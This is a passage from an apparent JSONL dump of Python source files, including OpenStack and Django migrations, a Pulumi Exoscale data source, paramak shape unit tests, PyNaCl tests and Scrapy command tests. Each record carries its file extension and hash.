_glorot,\n }\n if parameter is not None:\n if type not in init.fun:\n raise ValueError('Type unknown. Please choose among one of the following: {}'.format('\\n'.join(list(init.fun.keys()))))\n init.fun[type](parameter, *args, **kwargs)\n return parameter\n"} {"ext": "py", "sha": "1a302ff1179861321b53b352710d282bb3b342bd", "content": "# Copyright 2014 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"ml2_vnic_type\n\nRevision ID: 27cc183af192\nRevises: 4ca36cfc898c\nCreate Date: 2014-02-09 12:19:21.362967\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '27cc183af192'\ndown_revision = '4ca36cfc898c'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom neutron.db import migration\n\n\ndef upgrade():\n if migration.schema_has_table('ml2_port_bindings'):\n op.add_column('ml2_port_bindings',\n sa.Column('vnic_type', sa.String(length=64),\n nullable=False,\n server_default='normal'))\n"} {"ext": "py", "sha": "1a3030fa80ac15146753e094f3ad868bd2a41199", "content": "# Copyright (C) 2010 Google Inc. 
All rights reserved.\n# Copyright (C) 2010 Gabor Rapcsanyi (rgabor@inf.u-szeged.hu), University of Szeged\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nclass TestInput(object):\n \"\"\"Groups information about a test for easy passing of data.\"\"\"\n\n def __init__(self, test_name, timeout=None, requires_lock=None, reference_files=None, should_run_pixel_tests=None, should_add_missing_baselines=True):\n # TestInput objects are normally constructed by the manager and passed\n # to the workers, but these some fields are set lazily in the workers where possible\n # because they require us to look at the filesystem and we want to be able to do that in parallel.\n self.test_name = test_name\n self.timeout = timeout # in msecs; should rename this for consistency\n self.requires_lock = requires_lock\n self.reference_files = reference_files\n self.should_run_pixel_tests = should_run_pixel_tests\n self.should_add_missing_baselines = should_add_missing_baselines\n\n def __repr__(self):\n return \"TestInput('%s', timeout=%s, requires_lock=%s, reference_files=%s, should_run_pixel_tests=%s, should_add_missing_baselines%s)\" % (self.test_name, self.timeout, self.requires_lock, self.reference_files, self.should_run_pixel_tests, self.should_add_missing_baselines)\n"} {"ext": "py", "sha": "1a3031c093c77a2f9fca69a9a31d97ce454786c8", "content": "# coding=utf-8\n# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***\n# *** Do not edit by hand unless you're certain you know what you are doing! ***\n\nimport warnings\nimport pulumi\nimport pulumi.runtime\nfrom typing import Any, Mapping, Optional, Sequence, Union, overload\nfrom . 
import _utilities\n\n__all__ = [\n 'GetAntiAffinityGroupResult',\n 'AwaitableGetAntiAffinityGroupResult',\n 'get_anti_affinity_group',\n 'get_anti_affinity_group_output',\n]\n\n@pulumi.output_type\nclass GetAntiAffinityGroupResult:\n \"\"\"\n A collection of values returned by getAntiAffinityGroup.\n \"\"\"\n def __init__(__self__, id=None, instances=None, name=None):\n if id and not isinstance(id, str):\n raise TypeError(\"Expected argument 'id' to be a str\")\n pulumi.set(__self__, \"id\", id)\n if instances and not isinstance(instances, list):\n raise TypeError(\"Expected argument 'instances' to be a list\")\n pulumi.set(__self__, \"instances\", instances)\n if name and not isinstance(name, str):\n raise TypeError(\"Expected argument 'name' to be a str\")\n pulumi.set(__self__, \"name\", name)\n\n @property\n @pulumi.getter\n def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")\n\n @property\n @pulumi.getter\n def instances(self) -> Sequence[str]:\n \"\"\"\n A list of Compute instance IDs belonging to the Anti-Affinity Group.\n \"\"\"\n return pulumi.get(self, \"instances\")\n\n @property\n @pulumi.getter\n def name(self) -> Optional[str]:\n return pulumi.get(self, \"name\")\n\n\nclass AwaitableGetAntiAffinityGroupResult(GetAntiAffinityGroupResult):\n # pylint: disable=using-constant-test\n def __await__(self):\n if False:\n yield self\n return GetAntiAffinityGroupResult(\n id=self.id,\n instances=self.instances,\n name=self.name)\n\n\ndef get_anti_affinity_group(id: Optional[str] = None,\n name: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetAntiAffinityGroupResult:\n \"\"\"\n Provides information on an [Anti-Affinity Group][aag-doc] for use in other resources such as a [`Compute`][r-compute] resource.\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_exoscale as exoscale\n\n zone = \"ch-gva-2\"\n web = exoscale.get_anti_affinity_group(name=\"web\")\n ubuntu = exoscale.get_compute_template(zone=zone,\n name=\"Linux Ubuntu 20.04 LTS 64-bit\")\n my_server = exoscale.ComputeInstance(\"my-server\",\n zone=zone,\n type=\"standard.medium\",\n template_id=ubuntu.id,\n disk_size=20,\n anti_affinity_group_ids=[web.id])\n ```\n\n\n :param str id: The ID of the Anti-Affinity Group (conflicts with `name`).\n :param str name: The name of the Anti-Affinity Group (conflicts with `id`).\n \"\"\"\n __args__ = dict()\n __args__['id'] = id\n __args__['name'] = name\n if opts is None:\n opts = pulumi.InvokeOptions()\n if opts.version is None:\n opts.version = _utilities.get_version()\n __ret__ = pulumi.runtime.invoke('exoscale:index/getAntiAffinityGroup:getAntiAffinityGroup', __args__, opts=opts, typ=GetAntiAffinityGroupResult).value\n\n return AwaitableGetAntiAffinityGroupResult(\n id=__ret__.id,\n instances=__ret__.instances,\n name=__ret__.name)\n\n\n@_utilities.lift_output_func(get_anti_affinity_group)\ndef get_anti_affinity_group_output(id: Optional[pulumi.Input[Optional[str]]] = None,\n name: Optional[pulumi.Input[Optional[str]]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetAntiAffinityGroupResult]:\n \"\"\"\n Provides information on an [Anti-Affinity Group][aag-doc] for use in other resources such as a [`Compute`][r-compute] resource.\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_exoscale as exoscale\n\n zone = \"ch-gva-2\"\n web = exoscale.get_anti_affinity_group(name=\"web\")\n ubuntu = exoscale.get_compute_template(zone=zone,\n name=\"Linux Ubuntu 20.04 LTS 64-bit\")\n my_server = 
exoscale.ComputeInstance(\"my-server\",\n zone=zone,\n type=\"standard.medium\",\n template_id=ubuntu.id,\n disk_size=20,\n anti_affinity_group_ids=[web.id])\n ```\n\n\n :param str id: The ID of the Anti-Affinity Group (conflicts with `name`).\n :param str name: The name of the Anti-Affinity Group (conflicts with `id`).\n \"\"\"\n ...\n"} {"ext": "py", "sha": "1a30322d7e1936cec3355bfbf561d0a3d3d83712", "content": "from students import views as students_views\r\nfrom django.urls import path\r\nfrom django.contrib.auth import views as auth_views\r\n\r\nurlpatterns = [\r\n\tpath('login/', auth_views.LoginView.as_view(template_name='students/student/login.html'), name = 'login'),\r\n\tpath('logout/', auth_views.LogoutView.as_view(template_name='students/student/logout.html'), name = 'logout'),\r\n\tpath('register/',students_views.StudentRegistrationView.as_view(), name='student_registration'),\r\n\tpath('enroll-course/',students_views.StudentEnrollCourseView.as_view(), name='student_enroll_course'),\r\n\tpath('courses/', students_views.StudentCourseListView.as_view(), name='student_course_list'),\r\n\tpath('course//', students_views.StudentCourseDetailView.as_view(), name='student_course_detail'),\r\n\tpath('course///', students_views.StudentCourseDetailView.as_view(), name='student_course_detail_module'),\r\n]"} {"ext": "py", "sha": "1a303245c72a284cd75bda66d762438a81461f37", "content": "import os\nimport unittest\nfrom pathlib import Path\n\nimport paramak\nimport pytest\n\n\nclass test_object_properties(unittest.TestCase):\n def test_shape_default_properties(self):\n \"\"\"Creates a Shape object and checks that the points attribute has\n a default of None.\"\"\"\n\n test_shape = paramak.Shape()\n\n assert test_shape.points is None\n\n def test_incorrect_workplane(self):\n \"\"\"Creates Shape object with incorrect workplane and checks ValueError\n is raised.\"\"\"\n\n test_shape = paramak.Shape()\n\n def incorrect_workplane():\n \"\"\"Creates Shape object with unacceptable workplane.\"\"\"\n\n test_shape.workplane = \"ZY\"\n\n self.assertRaises(ValueError, incorrect_workplane)\n\n def test_incorrect_points(self):\n \"\"\"Creates Shape objects and checks errors are raised correctly when\n specifying points.\"\"\"\n\n test_shape = paramak.Shape()\n\n def incorrect_points_end_point_is_start_point():\n \"\"\"Checks ValueError is raised when the start and end points are\n the same.\"\"\"\n\n test_shape.points = [(0, 200), (200, 100), (0, 0), (0, 200)]\n\n self.assertRaises(\n ValueError,\n incorrect_points_end_point_is_start_point)\n\n def incorrect_points_missing_z_value():\n \"\"\"Checks ValueError is raised when a point is missing a z\n value.\"\"\"\n\n test_shape.points = [(0, 200), (200), (0, 0), (0, 50)]\n\n self.assertRaises(ValueError, incorrect_points_missing_z_value)\n\n def incorrect_points_not_a_list():\n \"\"\"Checks ValueError is raised when the points are not a list.\"\"\"\n\n test_shape.points = (0, 0), (0, 20), (20, 20), (20, 0)\n\n self.assertRaises(ValueError, incorrect_points_not_a_list)\n\n def incorrect_points_wrong_number_of_entries():\n \"\"\"Checks ValueError is raised when individual points dont have 2\n or 3 entries.\"\"\"\n\n test_shape.points = [(0, 0), (0, 20), (20, 20, 20, 20)]\n\n self.assertRaises(ValueError, incorrect_points_wrong_number_of_entries)\n\n def incorrect_x_point_value_type():\n \"\"\"Checks ValueError is raised when X point is not a number.\"\"\"\n\n test_shape.points = [(\"string\", 0), (0, 20), (20, 20)]\n\n self.assertRaises(ValueError, 
incorrect_x_point_value_type)\n\n def incorrect_y_point_value_type():\n \"\"\"Checks ValueError is raised when Y point is not a number.\"\"\"\n\n test_shape.points = [(0, \"string\"), (0, 20), (20, 20)]\n\n self.assertRaises(ValueError, incorrect_y_point_value_type)\n\n def test_create_limits(self):\n \"\"\"Creates a Shape object and checks that the create_limits function\n returns the expected values for x_min, x_max, z_min and z_max.\"\"\"\n\n test_shape = paramak.Shape()\n\n test_shape.points = [\n (0, 0),\n (0, 10),\n (0, 20),\n (10, 20),\n (20, 20),\n (20, 10),\n (20, 0),\n (10, 0),\n ]\n\n assert test_shape.create_limits() == (0.0, 20.0, 0.0, 20.0)\n\n # test with a component which has a find_points method\n test_shape2 = paramak.Plasma()\n test_shape2.create_limits()\n assert test_shape2.x_min is not None\n\n def test_create_limits_error(self):\n \"\"\"Checks error is raised when no points are given.\"\"\"\n\n test_shape = paramak.Shape()\n\n def limits():\n test_shape.create_limits()\n self.assertRaises(ValueError, limits)\n\n def test_export_2d_image(self):\n \"\"\"Creates a Shape object and checks that a png file of the object with\n the correct suffix can be exported using the export_2d_image method.\"\"\"\n\n test_shape = paramak.Shape()\n test_shape.points = [(0, 0), (0, 20), (20, 20), (20, 0)]\n os.system(\"rm filename.png\")\n test_shape.export_2d_image(\"filename\")\n assert Path(\"filename.png\").exists() is True\n os.system(\"rm filename.png\")\n test_shape.export_2d_image(\"filename.png\")\n assert Path(\"filename.png\").exists() is True\n os.system(\"rm filename.png\")\n\n def test_initial_solid_construction(self):\n \"\"\"Creates a shape and checks that a cadquery solid with a unique hash\n value is created when .solid is called.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20), (20, 0)], rotation_angle=360\n )\n\n assert test_shape.hash_value is None\n assert test_shape.solid is not None\n assert type(test_shape.solid).__name__ == \"Workplane\"\n assert test_shape.hash_value is not None\n\n def test_solid_return(self):\n \"\"\"Checks that the same cadquery solid with the same unique hash value\n is returned when shape.solid is called again after no changes have been\n made to the Shape.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20), (20, 0)], rotation_angle=360\n )\n\n assert test_shape.solid is not None\n initial_hash_value = test_shape.hash_value\n assert test_shape.solid is not None\n assert initial_hash_value == test_shape.hash_value\n\n def test_conditional_solid_reconstruction(self):\n \"\"\"Checks that a new cadquery solid with a new unique hash value is\n constructed when shape.solid is called after changes to the Shape have\n been made.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)], rotation_angle=360\n )\n\n assert test_shape.solid is not None\n assert test_shape.hash_value is not None\n initial_hash_value = test_shape.hash_value\n\n test_shape.rotation_angle = 180\n\n assert test_shape.solid is not None\n assert test_shape.hash_value is not None\n assert initial_hash_value != test_shape.hash_value\n\n def test_hash_value_update(self):\n \"\"\"Checks that the hash value of a Shape is not updated until a new\n cadquery solid has been created.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)], rotation_angle=360\n )\n test_shape.solid\n assert test_shape.hash_value is not None\n initial_hash_value = 
test_shape.hash_value\n\n test_shape.rotation_angle = 180\n assert test_shape.hash_value == initial_hash_value\n test_shape.solid\n assert test_shape.hash_value != initial_hash_value\n\n def test_material_tag_warning(self):\n \"\"\"Checks that a warning is raised when a Shape has a material tag >\n 28 characters.\"\"\"\n\n test_shape = paramak.Shape()\n\n def warning_material_tag():\n\n test_shape.material_tag = \"abcdefghijklmnopqrstuvwxyz12345\"\n\n self.assertWarns(UserWarning, warning_material_tag)\n\n def test_invalid_material_tag(self):\n \"\"\"Checks a ValueError is raised when a Shape has an invalid material\n tag.\"\"\"\n\n test_shape = paramak.Shape()\n\n def invalid_material_tag():\n\n test_shape.material_tag = 123\n\n self.assertRaises(ValueError, invalid_material_tag)\n\n def test_export_html(self):\n \"\"\"Checks a plotly figure of the Shape is exported by the export_html\n method with the correct filename with RGB and RGBA colors.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20), (20, 0)], rotation_angle=360\n )\n\n os.system(\"rm filename.html\")\n test_shape.export_html('filename')\n assert Path(\"filename.html\").exists() is True\n os.system(\"rm filename.html\")\n test_shape.color = (1, 0, 0, 0.5)\n test_shape.export_html('filename')\n assert Path(\"filename.html\").exists() is True\n os.system(\"rm filename.html\")\n\n def test_export_html_with_points_None(self):\n \"\"\"Checks that an error is raised when points is None and export_html\n \"\"\"\n test_shape = paramak.Shape()\n\n def export():\n test_shape.export_html(\"out.html\")\n self.assertRaises(ValueError, export)\n\n def test_invalid_stp_filename(self):\n \"\"\"Checks ValueError is raised when invalid stp filenames are used.\"\"\"\n\n def invalid_filename_suffix():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n stp_filename=\"filename.invalid_suffix\"\n )\n\n self.assertRaises(ValueError, invalid_filename_suffix)\n\n def invalid_filename_type():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n stp_filename=123456\n )\n\n self.assertRaises(ValueError, invalid_filename_type)\n\n def test_invalid_stl_filename(self):\n \"\"\"Checks ValueError is raised when invalid stl filenames are used.\"\"\"\n\n def invalid_filename_suffix():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n stl_filename=\"filename.invalid_suffix\"\n )\n\n self.assertRaises(ValueError, invalid_filename_suffix)\n\n def invalid_filename_type():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n stl_filename=123456\n )\n\n self.assertRaises(ValueError, invalid_filename_type)\n\n def test_invalid_color(self):\n \"\"\"Checks ValueError is raised when invalid colors are used.\"\"\"\n\n def invalid_color_type():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n color=255\n )\n\n self.assertRaises(ValueError, invalid_color_type)\n\n def invalid_color_length():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n color=(255, 255, 255, 1, 1)\n )\n\n self.assertRaises(ValueError, invalid_color_length)\n\n def test_volumes_add_up_to_total_volume_Compound(self):\n \"\"\"Checks the volume and volumes attributes are correct types\n and that the volumes sum to equalt the volume for a Compound.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoilSet(\n heights=[10, 10],\n widths=[20, 20],\n center_points=[(15, 15), (50, 50)]\n )\n\n assert isinstance(test_shape.volume, float)\n assert 
isinstance(test_shape.volumes, list)\n assert isinstance(test_shape.volumes[0], float)\n assert isinstance(test_shape.volumes[1], float)\n assert len(test_shape.volumes) == 2\n assert sum(test_shape.volumes) == pytest.approx(test_shape.volume)\n\n def test_volumes_add_up_to_total_volume(self):\n \"\"\"Checks the volume and volumes attributes are correct types\n and that the volumes sum to equalt the volume.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoil(\n center_point=(100, 100),\n height=50,\n width=50\n )\n\n assert isinstance(test_shape.volume, float)\n assert isinstance(test_shape.volumes, list)\n assert isinstance(test_shape.volumes[0], float)\n assert len(test_shape.volumes) == 1\n assert sum(test_shape.volumes) == pytest.approx(test_shape.volume)\n\n def test_areas_add_up_to_total_area_Compound(self):\n \"\"\"Checks the area and areas attributes are correct types\n and that the areas sum to equalt the area for a Compound.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoilSet(\n heights=[10, 10],\n widths=[20, 20],\n center_points=[(15, 15), (50, 50)]\n )\n\n assert isinstance(test_shape.area, float)\n assert isinstance(test_shape.areas, list)\n assert isinstance(test_shape.areas[0], float)\n assert isinstance(test_shape.areas[1], float)\n assert isinstance(test_shape.areas[2], float)\n assert isinstance(test_shape.areas[3], float)\n assert isinstance(test_shape.areas[4], float)\n assert isinstance(test_shape.areas[5], float)\n assert isinstance(test_shape.areas[6], float)\n assert isinstance(test_shape.areas[7], float)\n assert len(test_shape.areas) == 8\n assert sum(test_shape.areas) == pytest.approx(test_shape.area)\n\n def test_areas_add_up_to_total_area(self):\n \"\"\"Checks the area and areas attributes are correct types\n and that the areas sum to equalt the area.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoil(\n center_point=(100, 100),\n height=50,\n width=50\n )\n\n assert isinstance(test_shape.area, float)\n assert isinstance(test_shape.areas, list)\n assert isinstance(test_shape.areas[0], float)\n assert isinstance(test_shape.areas[1], float)\n assert isinstance(test_shape.areas[2], float)\n assert isinstance(test_shape.areas[3], float)\n assert len(test_shape.areas) == 4\n assert sum(test_shape.areas) == pytest.approx(test_shape.area)\n\n def test_trace(self):\n \"\"\"Test trace method is populated\"\"\"\n\n test_shape = paramak.PoloidalFieldCoil(\n center_point=(100, 100),\n height=50,\n width=50,\n name=\"coucou\"\n )\n assert test_shape._trace() is not None\n\n def test_create_patch_error(self):\n \"\"\"Checks _create_patch raises a ValueError when points is None.\"\"\"\n\n test_shape = paramak.Shape()\n\n def patch():\n test_shape._create_patch()\n self.assertRaises(ValueError, patch)\n\n def test_create_patch_alpha(self):\n \"\"\"Checks _create_patch returns a patch when alpha is given.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoil(\n center_point=(100, 100),\n height=50,\n width=50,\n color=(0.5, 0.5, 0.5, 0.1)\n )\n assert test_shape._create_patch() is not None\n\n def test_azimuth_placement_angle_error(self):\n \"\"\"Checks an error is raised when invalid value for\n azimuth_placement_angle is set.\n \"\"\"\n\n test_shape = paramak.Shape()\n\n def angle_str():\n test_shape.azimuth_placement_angle = \"coucou\"\n\n def angle_str_in_Iterable():\n test_shape.azimuth_placement_angle = [0, \"coucou\"]\n\n self.assertRaises(ValueError, angle_str)\n self.assertRaises(ValueError, angle_str_in_Iterable)\n\n def test_name_error(self):\n \"\"\"Checks an error is raised 
when invalid value for name is set.\"\"\"\n\n test_shape = paramak.Shape()\n\n def name_float():\n test_shape.name = 2.0\n\n def name_int():\n test_shape.name = 1\n\n def name_list():\n test_shape.name = ['coucou']\n\n self.assertRaises(ValueError, name_float)\n self.assertRaises(ValueError, name_int)\n self.assertRaises(ValueError, name_list)\n\n def test_tet_mesh_error(self):\n \"\"\"Checks an error is raised when invalid value for tet_mesh is set.\n \"\"\"\n\n test_shape = paramak.Shape()\n\n def tet_mesh_float():\n test_shape.tet_mesh = 2.0\n\n def tet_mesh_int():\n test_shape.tet_mesh = 1\n\n def tet_mesh_list():\n test_shape.tet_mesh = ['coucou']\n\n self.assertRaises(ValueError, tet_mesh_float)\n self.assertRaises(ValueError, tet_mesh_int)\n self.assertRaises(ValueError, tet_mesh_list)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"} {"ext": "py", "sha": "1a30325f5d4164daea8c87fa9097fd7f33691106", "content": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.18 on 2019-02-02 02:47\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('analytics', '0012_add_on_delete'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='installationcount',\n name='anomaly',\n ),\n migrations.RemoveField(\n model_name='realmcount',\n name='anomaly',\n ),\n migrations.RemoveField(\n model_name='streamcount',\n name='anomaly',\n ),\n migrations.RemoveField(\n model_name='usercount',\n name='anomaly',\n ),\n migrations.DeleteModel(\n name='Anomaly',\n ),\n ]\n"} {"ext": "py", "sha": "1a30344239c042a1e6ef36359372f2b2b353fca3", "content": "\"\"\"This file is part of Splitter which is released under MIT License.\n\nagg.py defines aggregation functions\n\"\"\"\n\nfrom splitter.dataflow.validation import check_metrics_and_filters, countable\nfrom splitter.struct import IteratorVideoStream\nfrom splitter.dataflow.xform import Null\n\nimport logging\nimport time\nimport itertools\n\ndef count(stream, keys, stats=False):\n\t\"\"\"Count counts the true hits of a defined event.\n\t\"\"\"\n\n\t#actual logic is here\n\tcounter = {}\n\tframe_count = 0\n\tnow = time.time()\n\tfor frame in stream:\n\t\tframe_count += 1\n\n\t\tif frame_count == 1:\n\t\t\tlogging.info(\"Processing first frame of stream\")\n\n\t\tfor key in keys:\n\t\t\tif frame[key]:\n\t\t\t\tsubkey = key + '_' + str(frame[key])\n\t\t\t\tcounter[subkey] = counter.get(subkey,0) + 1\n\n\t# profiling\n\tfor obj in stream.lineage():\n\t\tif hasattr(obj, \"time_elapsed\"):\n\t\t\tlogging.info(\"%s: %s\" % (type(obj).__name__, obj.time_elapsed))\n\t\telse:\n\t\t\tlogging.info(\"%s time not measured\" % type(obj).__name__)\n\n\tif not stats:\n\t\treturn counter\n\telse:\n\t\treturn counter, {'frames': frame_count, \\\n\t\t\t\t\t\t 'elapsed': (time.time() - now)}\n\ndef counts(streams, keys, stats=False):\n\t\"\"\"Count counts the true hits of a defined event.\n\t\"\"\"\n\tstream = IteratorVideoStream(itertools.chain(*streams), streams)\n\n\tlineage = []\n\tfor s in streams:\n\t\tlineage.extend(s.lineage())\n\n\tstream.global_lineage = lineage\n\n\treturn count(stream, keys, stats)\n\n\ndef get(stream, key, frame_rate=-1):\n\tif frame_rate == -1:\n\t\treturn [(v['frame'], v['data']) for v in stream if v[key]]\n\telse:\n\t\treturn [( int(v['frame']/frame_rate) , v['data']) for v in stream if v[key]]\n"} {"ext": "py", "sha": "1a303659262fe745e6841a0210726edee312644d", "content": "# Copyright 2013 Donald Stufft and individual contributors\n#\n# Licensed 
under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import, division, print_function\n\nimport nacl.utils\n\n\ndef test_random_bytes_produces():\n assert len(nacl.utils.random(16)) == 16\n\n\ndef test_random_bytes_produces_different_bytes():\n assert nacl.utils.random(16) != nacl.utils.random(16)\n"} {"ext": "py", "sha": "1a30368ba432bca7020336b00c15858178716151", "content": "import os\nimport sys\nimport subprocess\nimport tempfile\nfrom time import sleep\nfrom os.path import exists, join, abspath\nfrom shutil import rmtree, copytree\nfrom tempfile import mkdtemp\nimport six\n\nfrom twisted.trial import unittest\nfrom twisted.internet import defer\n\nimport scrapy\nfrom scrapy.utils.python import to_native_str\nfrom scrapy.utils.python import retry_on_eintr\nfrom scrapy.utils.test import get_testenv\nfrom scrapy.utils.testsite import SiteTest\nfrom scrapy.utils.testproc import ProcessTest\n\n\nclass ProjectTest(unittest.TestCase):\n project_name = 'testproject'\n\n def setUp(self):\n self.temp_path = mkdtemp()\n self.cwd = self.temp_path\n self.proj_path = join(self.temp_path, self.project_name)\n self.proj_mod_path = join(self.proj_path, self.project_name)\n self.env = get_testenv()\n\n def tearDown(self):\n rmtree(self.temp_path)\n\n def call(self, *new_args, **kwargs):\n with tempfile.TemporaryFile() as out:\n args = (sys.executable, '-m', 'scrapy.cmdline') + new_args\n return subprocess.call(args, stdout=out, stderr=out, cwd=self.cwd,\n env=self.env, **kwargs)\n\n def proc(self, *new_args, **kwargs):\n args = (sys.executable, '-m', 'scrapy.cmdline') + new_args\n p = subprocess.Popen(args, cwd=self.cwd, env=self.env,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n **kwargs)\n\n waited = 0\n interval = 0.2\n while p.poll() is None:\n sleep(interval)\n waited += interval\n if waited > 15:\n p.kill()\n assert False, 'Command took too much time to complete'\n\n return p\n\n\nclass StartprojectTest(ProjectTest):\n\n def test_startproject(self):\n self.assertEqual(0, self.call('startproject', self.project_name))\n\n assert exists(join(self.proj_path, 'scrapy.cfg'))\n assert exists(join(self.proj_path, 'testproject'))\n assert exists(join(self.proj_mod_path, '__init__.py'))\n assert exists(join(self.proj_mod_path, 'items.py'))\n assert exists(join(self.proj_mod_path, 'pipelines.py'))\n assert exists(join(self.proj_mod_path, 'settings.py'))\n assert exists(join(self.proj_mod_path, 'spiders', '__init__.py'))\n\n self.assertEqual(1, self.call('startproject', self.project_name))\n self.assertEqual(1, self.call('startproject', 'wrong---project---name'))\n self.assertEqual(1, self.call('startproject', 'sys'))\n\n\nclass StartprojectTemplatesTest(ProjectTest):\n\n def setUp(self):\n super(StartprojectTemplatesTest, self).setUp()\n self.tmpl = join(self.temp_path, 'templates')\n self.tmpl_proj = join(self.tmpl, 'project')\n\n def test_startproject_template_override(self):\n copytree(join(scrapy.__path__[0], 'templates'), self.tmpl)\n with open(join(self.tmpl_proj, 
'root_template'), 'w'):\n pass\n assert exists(join(self.tmpl_proj, 'root_template'))\n\n args = ['--set', 'TEMPLATES_DIR=%s' % self.tmpl]\n p = self.proc('startproject', self.project_name, *args)\n out = to_native_str(retry_on_eintr(p.stdout.read))\n self.assertIn(\"New Scrapy project %r, using template directory\" % self.project_name, out)\n self.assertIn(self.tmpl_proj, out)\n assert exists(join(self.proj_path, 'root_template'))\n\n\nclass CommandTest(ProjectTest):\n\n def setUp(self):\n super(CommandTest, self).setUp()\n self.call('startproject', self.project_name)\n self.cwd = join(self.temp_path, self.project_name)\n self.env['SCRAPY_SETTINGS_MODULE'] = '%s.settings' % self.project_name\n\n\nclass GenspiderCommandTest(CommandTest):\n\n def test_arguments(self):\n # only pass one argument. spider script shouldn't be created\n self.assertEqual(2, self.call('genspider', 'test_name'))\n assert not exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))\n # pass two arguments . spider script should be created\n self.assertEqual(0, self.call('genspider', 'test_name', 'test.com'))\n assert exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))\n\n def test_template(self, tplname='crawl'):\n args = ['--template=%s' % tplname] if tplname else []\n spname = 'test_spider'\n p = self.proc('genspider', spname, 'test.com', *args)\n out = to_native_str(retry_on_eintr(p.stdout.read))\n self.assertIn(\"Created spider %r using template %r in module\" % (spname, tplname), out)\n self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py')))\n p = self.proc('genspider', spname, 'test.com', *args)\n out = to_native_str(retry_on_eintr(p.stdout.read))\n self.assertIn(\"Spider %r already exists in module\" % spname, out)\n\n def test_template_basic(self):\n self.test_template('basic')\n\n def test_template_csvfeed(self):\n self.test_template('csvfeed')\n\n def test_template_xmlfeed(self):\n self.test_template('xmlfeed')\n\n def test_list(self):\n self.assertEqual(0, self.call('genspider', '--list'))\n\n def test_dump(self):\n self.assertEqual(0, self.call('genspider', '--dump=basic'))\n self.assertEqual(0, self.call('genspider', '-d', 'basic'))\n\n def test_same_name_as_project(self):\n self.assertEqual(2, self.call('genspider', self.project_name))\n assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name))\n\n\nclass MiscCommandsTest(CommandTest):\n\n def test_list(self):\n 